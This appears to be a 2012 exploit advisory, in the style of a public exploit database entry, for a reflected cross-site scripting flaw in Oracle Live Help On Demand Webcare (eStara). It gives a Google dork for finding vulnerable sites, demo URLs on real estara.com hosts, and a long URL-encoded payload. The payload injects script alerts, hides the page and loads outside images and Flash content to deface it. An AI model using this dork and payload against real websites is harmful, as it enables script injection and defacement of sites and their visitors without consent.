# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting # Date: 29.02.2012 # Author: Sony # Software Link: http://www.oracle.com/index.html # Google Dorks:inurl:UI/gui.php # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html .................................................................. Demo: http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here] http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217×tamp=1234150034 or https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25×tamp=1321973587 http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Hi%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:it%27s%20Song..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:What%20Song?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%20by%20Dan%20Balan%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Oh,cool..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:p.s.%20I%20found%20xss%20on%20the%20oracle..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Don%27t%20care,%20i%20like%20this%20song..Uhh%20Ahh%20Yeah!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Yeah..%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.hampton.gov/youth/images/white_background.png%27%29;}%3C/style%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://4.bp.blogspot.com/_iHaUzis1v4c/TK_GUArAtqI/AAAAAAAANeU/6vCNrSFQu2E/s640/Ascii_Dance.gif%22%20style=%22height:%20350px;%20width:%20576px;%22%3E%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=/img/uploadimg/20120301/1708350.JPG Video: http://www.youtube.com/watch?v=og_Ev7glz_g